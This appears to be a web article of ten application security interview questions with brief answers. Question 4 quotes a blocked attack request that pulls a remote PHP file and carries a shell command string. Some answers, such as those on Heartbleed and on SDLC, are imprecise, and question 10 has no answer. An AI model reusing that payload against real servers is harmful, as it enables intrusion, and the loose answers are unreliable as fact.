10 Most Common Application Security Interview Questions
Application security deals with the use of software, hardware and several methods to avoid external threats and protect application. Application security is gaining its market today because most the applications are made accessible over the network, increasing chances of vulnerability and threats.
If you are being interviewed for post relating to application security, chances are high that you will be asked about basic security concepts relating to it.
Here we list 10 most common application security interview questions that you are likely to face.
1. What is difference between Proxy, IDS and IPS?
Answer: Proxy Server is a relay that is used for caching, monitoring and controlling the traffic in a network. Proxy caches frequently accessed data and serves a cached copy of data to end user to speed up things. It is also used to set up rules that will allow or prevent network users from browsing a site or accessing some data. E.g. squid.
IDS or Intrusion Detection System is used to detect if intrusion is attempted generally based upon signatures it holds. E.g Snort
IPS or Intrusion Prevention System is something that goes beyond just detecting the intrusion. It drops the packet, if it suspects the packet to be malicious. Eg. IBM Proventia
2. How does asymmetric encryption work?
Answer: In Asymmetric encryption different keys are used on encrypting and decrypting sides. The party sending the data will encrypt the data using public key of receiver and the party receiving the data will decrypt it using private key. Private key is known to the receiver side only. This kind of encrypting is useful if information is to be transferred from many end users to a single address and is highly scalable.
3. On which stage of SDLC, security controls are integrated?
Answer: Security controls are integrated in the implementation phase. In this phase, control settings will be applied with compliance to rules set by vendors with the current implementation guidance.
4. Which application has generated the log below? What kind of attack is being performed?
Request: 22.214.171.124 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php
HTTP/1.1" 403 743
POST /index.php HTTP/1.1
Content-Encoding: gzip, deflate
User-Agent: Mozilla 4.0 (Linux)
mod_security-message: Access denied with code 403. Pattern match "uname\x20a"
lid=http://site.example.com/chill.php?&cmd=cd /tmp;id;lsuname -a
Answer: The log is of Mod_Security, which is a signature based web application firewall. The attempted attack seems to be a Remote code Execution.
5. What is difference between authentication and authorization?
Answer: Plainly put, Authentication is checking if credentials are correct. Authorization is checking what privilege you have, after being authenticated.
Authentication is checking if you are eligible to be granted permission in the application. Authorization is checking if you have privilege to perform certain action.
6. List some important issues to be considered to secure web server and web application.
Answer: Following are ways to secure web server:
- Optimal loggging
- Up-to-date system, patch applied
- Delete default script
- Manage ownership, file permissions.
Different ways to secure a web application are:
- Regular testing and assessment
- Enforcing input validation.
- Displaying generic error message.
7. Illustrate difference between vulnerability and exploit.
Answer: Vulnerability is a passive problem while exploit is an active. Think of it this way, your home lock is broken. This is a vulnerability. This has high chances of being exploited if your house is in large city, less if you live in rural area.
8. Which way of form submission would you implement for submitting sensitive information?
Answer: One always should use POST method to submit sensitive information like passwords.
9. Which vulnerability discovered recently allowed remote attacker to sniff cache in RAM of a linux machine?
Answer: It was heartbleed that allowed an attacker to sniff RAM cache remotely.
10. How does HTTP handle state?
While applying for the position of security expert, always make sure that you’ve understood the concepts of application security properly. Some of the most common terms are asset, threat, vulnerability, attack and countermeasures; this is what you should never forget about.
If you have any queries on application security questions listed above, or questions that you are unable to answer, write us in the comments below!